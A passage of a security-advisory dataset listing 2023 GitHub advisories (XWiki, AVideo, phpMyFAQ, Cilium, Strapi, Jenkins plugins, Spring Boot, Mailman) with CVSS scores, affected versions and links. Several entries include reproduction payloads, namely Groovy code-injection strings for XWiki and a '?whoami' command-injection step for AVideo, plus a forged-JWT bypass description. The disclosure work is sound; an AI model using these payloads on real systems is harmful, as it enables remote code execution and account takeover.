'org.xwiki.platform:xwiki-platform-flamingo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.9'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web-templates'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.9'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.9'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-web-standard'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.9'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-6vgh-9r3c-2cxp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29207'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/65ca06c51e7a1d5a579344c7272b2cc9a9a21126'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-15205'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-12T20:43:21Z', 'nvd_published_at': '2023-04-15T16:15:00Z'}
|
1.4.0
|
GHSA-fc42-5w56-qw7h
|
2023-04-20T22:17:16Z
|
2023-04-20T22:17:16Z
| null |
['CVE-2023-29524']
|
XWiki Platform vulnerable to code injection from account through XWiki.SchedulerJobSheet
|
### Impact
It's possible to execute anything with the right of the Scheduler Application sheet page.
To reproduce:
1. As a user without script or programming rights, edit your user profile with the object editor and add a new object of type XWiki.SchedulerJobClass (search for "Scheduler")
1. In "Job Script", add the following
```{{/code}} {{async async="true" cached="false" context="doc.reference"}}{{groovy}}println("Hello " + "from groovy!"){{/groovy} {{/async}}```
1. Click "Save & View"
1. If the job information isn't already displayed (you should see "Job Name", "Job Description", etc.), append ?sheet=XWiki.SchedulerJobSheet to the URL.
### Patches
This has been patched in XWiki 14.10.3 and 15.0 RC1.
### Workarounds
While the fix in the scheduler itself is easy, it relies on the code macro `source` parameter, which was introduced in 14.10.2 so you have to upgrade to benefit from it.
### References
https://jira.xwiki.org/browse/XWIKI-20295
https://jira.xwiki.org/browse/XWIKI-20462
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:[email protected])
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-scheduler-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.1'}, {'fixed': '14.10.3'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-fc42-5w56-qw7h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29524'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20295'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20462'}]
|
{'cwe_ids': ['CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-20T22:17:16Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-wj6r-53f5-q789
|
2023-04-27T19:54:52Z
|
2023-04-25T18:30:23Z
|
2023-04-27T19:54:13Z
|
[]
|
Duplicate Advisory: AVideo contains Command injection when embedding a video link
|
## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-pgvh-p3g4-86jw. This link is maintained to preserve external references.
## Original Description
Impact:
An attacker could execute remote code on a system running wwbn/avideo
Step to Reproduce:
1. Go to the `My Videos` tab
https://demo.avideo.com/mvideos
2. Click "Embed a video link"
Append a command to the url as a query string. eg. `?whoami`
then click Save
This issue has been resolved in commit `236228f15`
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'wwbn/avideo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '12.4'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/WWBN/AVideo/security/advisories/GHSA-pgvh-p3g4-86jw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25313'}]
|
{'cwe_ids': ['CWE-78', 'CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-27T19:52:26Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-3j93-7rf7-p7m6
|
2023-04-06T14:40:57Z
|
2023-04-05T18:30:18Z
| null |
['CVE-2023-1758']
|
thorsten/phpmyfaq vulnerable to stored cross-site scripting (XSS) in FAQ comment username parameter
|
thorsten/phpmyfaq prior to 3.1.12 is vulnerable to stored cross-site scripting (XSS) because it fails to sanitize user input in the FAQ comment username parameter. This has been fixed in 3.1.12.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.12'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1758'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/f3380f46c464d1bc6f3ded29213c79be0de8fc57'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpMyFAQ'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/0854328e-eb00-41a3-9573-8da8f00e369c'}]
|
{'cwe_ids': ['CWE-75', 'CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-05T21:27:37Z', 'nvd_published_at': '2023-04-05T16:15:00Z'}
|
1.4.0
|
GHSA-jgrg-qvpp-9vwr
|
2023-04-20T22:25:02Z
|
2023-04-20T22:25:02Z
| null |
['CVE-2023-29527']
|
XWiki Platform vulnerable to code injection from account through AWM view sheet
|
### Impact
Steps to reproduce:
1. As a user without script or programming right, edit your user profile (or any other document) with the wiki editor and add the content `{{groovy}}println("Hello " + "from Groovy!"){{/groovy}}`
1. Edit the document with the object editor and add an object of type AppWithinMinutes.LiveTableClass (no values need to be set, just save)
1. View the document
### Patches
The vulnerability has been patched in XWiki 15.0-rc-1 and 14.10.3.
### Workarounds
There is no known workaround.
### References
https://jira.xwiki.org/browse/XWIKI-20423
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:[email protected])
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-appwithinminutes-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.4.4'}, {'fixed': '14.10.3'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-jgrg-qvpp-9vwr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29527'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20423'}]
|
{'cwe_ids': ['CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-20T22:25:02Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-x2xw-hw8g-6773
|
2023-04-11T15:41:30Z
|
2023-04-11T15:41:30Z
| null |
[]
|
govuk_tech_docs vulnerable to unescaped HTML on search results page
|
### Impact
Pages that are indexed in search results have their entire contents indexed, including any HTML code snippets. These HTML snippets would appear in the search results unsanitised, so it was possible to render arbitrary HTML or run arbitrary scripts.
This is a low risk security issue; to exploit it, an attacker would need to find a way of committing malicious code to a page indexed by a site that uses tech-docs-gem (which are typically not editable by untrusted users). Their code would also be limited by the relatively short length that's rendered in the corresponding search result. Nevertheless, the XSS would then be triggerable by visiting a pre-constructed URL (/search/index.html?q=some+search+term), which users could be tricked into clicking on through social engineering.
### Patches
This has been fixed in v3.3.1. HTML is now sanitised in search results.
|
[]
|
[{'package': {'ecosystem': 'RubyGems', 'name': 'govuk_tech_docs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.2'}, {'fixed': '3.3.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/alphagov/tech-docs-gem/security/advisories/GHSA-x2xw-hw8g-6773'}, {'type': 'WEB', 'url': 'https://github.com/alphagov/tech-docs-gem/pull/323'}, {'type': 'PACKAGE', 'url': 'https://github.com/alphagov/tech-docs-gem'}, {'type': 'WEB', 'url': 'https://github.com/alphagov/tech-docs-gem/releases/tag/v3.3.1'}]
|
{'cwe_ids': ['CWE-79', 'CWE-80'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-04-11T15:41:30Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-pg5p-wwp8-97g8
|
2023-04-19T18:16:51Z
|
2023-04-19T18:16:51Z
| null |
['CVE-2023-29002']
|
Debug mode leaks confidential data in Cilium
|
### Impact
When run in debug mode, Cilium may log sensitive information.
In particular, Cilium running in debug mode will log the values of headers if they match HTTP network policy rules. This issue affects Cilium versions:
- 1.7.* to 1.10.* inclusive
- 1.11.* before 1.11.16
- 1.12.* before 1.12.9
- 1.13.* before 1.13.2
In addition, Cilium 1.12.* before 1.12.9 and 1.13.* before 1.13.2., when running in debug mode, might log secrets used by the Cilium agent. This includes TLS private keys for Ingress and GatewayAPI resources, depending on the configuration of the affected cluster. Output of the confidential data would occur at Cilium agent restart, when the secrets are modified, and on creation of Ingress or GatewayAPI resources.
### Patches
This vulnerability is fixed in Cilium releases 1.11.16, 1.12.9, and 1.13.2.
### Workarounds
Disable debug mode.
### Acknowledgements
The Cilium community has worked together with members of Isovalent to prepare these mitigations. Special thanks to @meyskens for investigating and fixing the issue.
### For more information
If you have any questions or comments about this advisory, please reach out on [Slack](https://docs.cilium.io/en/latest/community/community/#slack).
As usual, if you think you found a related vulnerability, we strongly encourage you to report security vulnerabilities to our private security mailing list: [[email protected]](mailto:[email protected]) - first, before disclosing them in any public forums. This is a private mailing list where only members of the Cilium internal security team are subscribed to, and is treated as top priority.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/cilium/cilium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.7.0'}, {'last_affected': '1.10.0'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/cilium/cilium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.11.0'}, {'fixed': '1.11.16'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/cilium/cilium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.12.0'}, {'fixed': '1.12.9'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/cilium/cilium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.13.0'}, {'fixed': '1.13.2'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/cilium/cilium/security/advisories/GHSA-pg5p-wwp8-97g8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29002'}, {'type': 'PACKAGE', 'url': 'https://github.com/cilium/cilium'}]
|
{'cwe_ids': ['CWE-532'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-19T18:16:51Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-xv3q-jrmm-4fxv
|
2023-04-18T22:28:02Z
|
2023-04-18T22:28:02Z
| null |
[]
|
Authentication Bypass in @strapi/plugin-users-permissions
|
### Summary
Strapi through 4.5.6 does not verify the access or ID tokens issued during the OAuth flow when the AWS Cognito login provider is used for authentication.
### Details
Strapi through 4.5.6 does not verify the access or ID tokens issued during the OAuth flow when the AWS Cognito login provider is used for authentication. A remote attacker could forge an ID token that is signed using the 'None' type algorithm to bypass authentication and impersonate any user that use AWS Cognito for authentication.
### IoC
Reviewing of application logs is recommended to detect any suspicious activity. Running the following regex pattern will extract all ID tokens sent to `/api/auth/cognito/callback`.
`/\/api\/auth\/cognito\/callback\?[\s\S]*id_token=\s*([\S]*)/`
Once you have a list of the ID tokens, you will need to verify each token using the public key file for your AWS Cognito user pool that you can download from `https://cognito-idp.{region}.amazonaws.com/{userPoolId}/.well-known/jwks.json`. If there are any JWT tokens that cannot be verified using the correct public key, then you need to inspect the JWT body and see if it contains the `email` and `cognito:username` claims (example below).
```json
{
"cognito:username": "auth-bypass-example",
"email": "[email protected]"
}
```
If there are any JWTs that have this body, verify when the account with the email address was created. If the account was created earlier than the request to `/api/auth/cognito/callback` with the invalid JWT token, then you need to contact the user to inform them their account has been breached!
After upgrading to Strapi v4.6.0 or greater you will need to reconfigure your AWS Cognito provider to include the JWKS URL for it to work properly. If you do not reconfigure your provider you will receive an error message when attempting to login.
### Impact
Any Strapi user using the users-permissions AWS Cognito provider before 4.6.0
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': '@strapi/plugin-users-permissions'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2.1'}, {'fixed': '4.6.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/strapi/strapi/security/advisories/GHSA-xv3q-jrmm-4fxv'}, {'type': 'WEB', 'url': 'https://github.com/strapi/strapi/pull/15382'}, {'type': 'WEB', 'url': 'https://github.com/strapi/strapi/commit/d0edd25ceb49d275d710bf8d59999a2c07072893'}, {'type': 'PACKAGE', 'url': 'https://github.com/strapi/strapi'}, {'type': 'WEB', 'url': 'https://github.com/strapi/strapi/releases/tag/v4.6.0'}]
|
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-18T22:28:02Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-vvp7-r422-rx83
|
2023-04-16T07:18:33Z
|
2023-04-12T20:40:00Z
| null |
['CVE-2023-29203']
|
Unauthenticated user can have information about hidden users on subwikis through uorgsuggest.vm
|
### Impact
It's possible to list some users who are normally not viewable from subwiki by requesting users on a subwiki which allows only global users with `uorgsuggest.vm`. This issue only concerns hidden users from main wiki.
Note that the disclosed information are the username and the first and last name of users, no other information is leaked.
### Patches
The problem has been patched on XWiki 13.10.8, 14.4.3 and 14.7RC1.
### Workarounds
It's possible to workaround this vulnerability by patching directly `uorgsuggest.vm ` to apply the same changes as in https://github.com/xwiki/xwiki-platform/pull/1883.
### References
* JIRA ticket: https://jira.xwiki.org/browse/XWIKI-20007
* this vulnerability is actually a remaining of https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-97jg-43c9-q6pf which wasn't entirely fixed back then
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira](https://jira.xwiki.org)
* Email us at [security ML](mailto:[email protected])
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web-templates'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '13.9-rc-1'}, {'fixed': '13.10.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web-templates'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0-rc-1'}, {'fixed': '14.4.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web-templates'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.7-rc-1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-97jg-43c9-q6pf'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-vvp7-r422-rx83'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29203'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/pull/1883'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20007'}]
|
{'cwe_ids': ['CWE-359', 'CWE-668'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-04-12T20:40:00Z', 'nvd_published_at': '2023-04-15T16:15:00Z'}
|
1.4.0
|
GHSA-q9hm-hr89-hgm7
|
2023-04-12T22:19:08Z
|
2023-04-12T18:30:36Z
| null |
['CVE-2023-30528']
|
Jenkins WSO2 Oauth Plugin does not mask the WSO2 Oauth client secret on the global configuration form
|
Jenkins WSO2 Oauth Plugin 1.0 and earlier stores the WSO2 Oauth client secret unencrypted in the global config.xml file on the Jenkins controller as part of its configuration.
This client secret can be viewed by users with access to the Jenkins controller file system.
Additionally, the global configuration form does not mask the WSO2 Oauth client secret, increasing the potential for attackers to observe and capture it.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:wso2id-oauth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30528'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-04-12/#SECURITY-2992'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/04/13/3'}]
|
{'cwe_ids': ['CWE-312'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-04-12T22:19:08Z', 'nvd_published_at': '2023-04-12T18:15:00Z'}
|
1.4.0
|
GHSA-hg5x-3w3x-7g96
|
2023-04-20T21:38:48Z
|
2023-04-20T21:38:48Z
| null |
['CVE-2023-29512']
|
xwiki-platform-web-templates vulnerable to Eval Injection
|
### Impact
Any user with edit rights on a page (e.g., it's own user page), can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of the information loaded from attachments in `imported.vm`, `importinline.vm`, and `packagelist.vm`. This page is installed by default.
Reproduction steps are described in https://jira.xwiki.org/browse/XWIKI-20267
### Patches
The vulnerability has been patched in XWiki 15.0-rc-1, 14.10.1, 14.4.8, and 13.10.11.
### Workarounds
The issue can be fixed by applying this [patch](https://github.com/xwiki/xwiki-platform/commit/e4bbdc23fea0be4ef1921d1a58648028ce753344) on `imported.vm`, `importinline.vm`, and `packagelist.vm`.
### References
- https://github.com/xwiki/xwiki-platform/commit/e4bbdc23fea0be4ef1921d1a58648028ce753344
- https://jira.xwiki.org/browse/XWIKI-20267
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:[email protected])
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web-templates'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0B1'}, {'fixed': '13.10.11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web-templates'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0-rc-1'}, {'fixed': '14.4.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web-templates'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-hg5x-3w3x-7g96'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29512'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/e4bbdc23fea0be4ef1921d1a58648028ce753344'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20267'}]
|
{'cwe_ids': ['CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-20T21:38:48Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-g66v-3v62-g375
|
2023-05-02T12:32:20Z
|
2023-04-21T03:30:36Z
| null |
['CVE-2023-2202']
|
RosarioSIS improper access control vulnerability
|
RosarioSIS prior to version 10.9.3 has a vulnerability that allows a user to return to a page containing personally identifiable information (PII) and sensitive information even after logging out of the application by using the browser's back button.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'francoisjacquet/rosariosis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.9.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2202'}, {'type': 'WEB', 'url': 'https://github.com/francoisjacquet/rosariosis/commit/6433946abfb34324616e833b1c00d0b2450753be'}, {'type': 'PACKAGE', 'url': 'https://github.com/francoisjacquet/rosariosis'}, {'type': 'WEB', 'url': 'https://github.com/francoisjacquet/rosariosis/compare/v10.9.2...v10.9.3'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/efe6ef47-d17c-4773-933a-4836c32db85c'}]
|
{'cwe_ids': ['CWE-284'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-24T20:19:30Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-xq3x-grrj-fj6x
|
2023-04-07T22:24:59Z
|
2023-04-02T12:30:16Z
| null |
['CVE-2023-1800']
|
sjqzhang go-fastdfs vulnerable to path traversal
|
sjqzhang go-fastdfs up to 1.4.3 is vulnerable to path traversal in the function upload of the file `/group1/upload` of the component `File Upload Handler`. The attack may be launched remotely and the exploit has been disclosed to the public and may be used.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/sjqzhang/go-fastdfs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.5-0.20230408141131-61cbff5124c6'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1800'}, {'type': 'WEB', 'url': 'https://github.com/sjqzhang/go-fastdfs/commit/61cbff5124c61e292994099372b11c06cdb5b80b'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-xq3x-grrj-fj6x'}, {'type': 'PACKAGE', 'url': 'https://github.com/sjqzhang/go-fastdfs'}, {'type': 'WEB', 'url': 'https://github.com/yangyanglo/ForCVE/blob/93a16663cd32a36d37d8a0f0102e1592254d0279/2023-0x05.md'}, {'type': 'WEB', 'url': 'https://github.com/yangyanglo/ForCVE/blob/main/2023-0x05.md'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.224768'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.224768'}]
|
{'cwe_ids': ['CWE-22'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-07T22:24:59Z', 'nvd_published_at': '2023-04-02T11:15:00Z'}
|
1.4.0
|
GHSA-8j88-2hfc-5rf3
|
2023-04-10T16:30:42Z
|
2023-04-02T21:30:17Z
| null |
['CVE-2023-28681']
|
Jenkins Visual Studio Code Metrics Plugin vulnerable to XML external entity (XXE) attacks
|
Jenkins Visual Studio Code Metrics Plugin 1.7 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
This allows attackers able to control VS Code Metrics File contents to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:vs-code-metrics'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.7'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28681'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/vs-code-metrics-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-03-21/#SECURITY-2926'}]
|
{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-03T22:53:56Z', 'nvd_published_at': '2023-04-02T21:15:00Z'}
|
1.4.0
|
GHSA-g5h3-w546-pj7f
|
2023-05-02T11:43:15Z
|
2023-04-20T21:33:27Z
| null |
['CVE-2023-20873']
|
Spring Boot Security Bypass with Wildcard Pattern Matching on Cloud Foundry
|
In Spring Boot versions 3.0.0 - 3.0.5, 2.7.0 - 2.7.10, and older unsupported versions, an application that is deployed to Cloud Foundry could be susceptible to a security bypass. Users of affected versions should apply the following mitigation: 3.0.x users should upgrade to 3.0.6+. 2.7.x users should upgrade to 2.7.11+. Users of older, unsupported versions should upgrade to 3.0.6+ or 2.7.11+.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework.boot:spring-boot-actuator-autoconfigure'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.boot:spring-boot-actuator-autoconfigure'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7.11'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-20873'}, {'type': 'WEB', 'url': 'https://github.com/spring-projects/spring-boot/commit/32444fed4b51cc58dc908467f706102d7f0bfc15'}, {'type': 'WEB', 'url': 'https://github.com/spring-projects/spring-boot/commit/3522714c13b47af03bf42e7f2d5994af568cb1a7'}, {'type': 'PACKAGE', 'url': 'https://github.com/spring-projects/spring-boot'}, {'type': 'WEB', 'url': 'https://github.com/spring-projects/spring-boot/releases/tag/v2.7.11'}, {'type': 'WEB', 'url': 'https://github.com/spring-projects/spring-boot/releases/tag/v3.0.6'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230601-0009/'}, {'type': 'WEB', 'url': 'https://spring.io/blog/2023/05/18/spring-boot-2-5-15-and-2-6-15-available-now'}, {'type': 'WEB', 'url': 'https://spring.io/security/cve-2023-20873'}]
|
{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-24T20:14:42Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-2jg5-xgvv-4wq7
|
2023-04-25T21:00:01Z
|
2023-04-15T21:30:16Z
| null |
['CVE-2021-34337']
|
Mailman Core vulnerable to timing attacks
|
An issue was discovered in Mailman Core before 3.3.5. An attacker with access to the REST API could use timing attacks to determine the value of the configured REST API password and then make arbitrary REST API calls. The REST API is bound to localhost by default, limiting the ability for attackers to exploit this, but can optionally be made to listen on other interfaces.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'mailman'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.5'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-34337'}, {'type': 'PACKAGE', 'url': 'https://gitlab.com/mailman/mailman'}, {'type': 'WEB', 'url': 'https://gitlab.com/mailman/mailman/-/commit/e4a39488c4510fcad8851217f10e7337a196bb51'}, {'type': 'WEB', 'url': 'https://gitlab.com/mailman/mailman/-/issues/911'}, {'type': 'WEB', 'url': 'https://gitlab.com/mailman/mailman/-/tags'}]
|
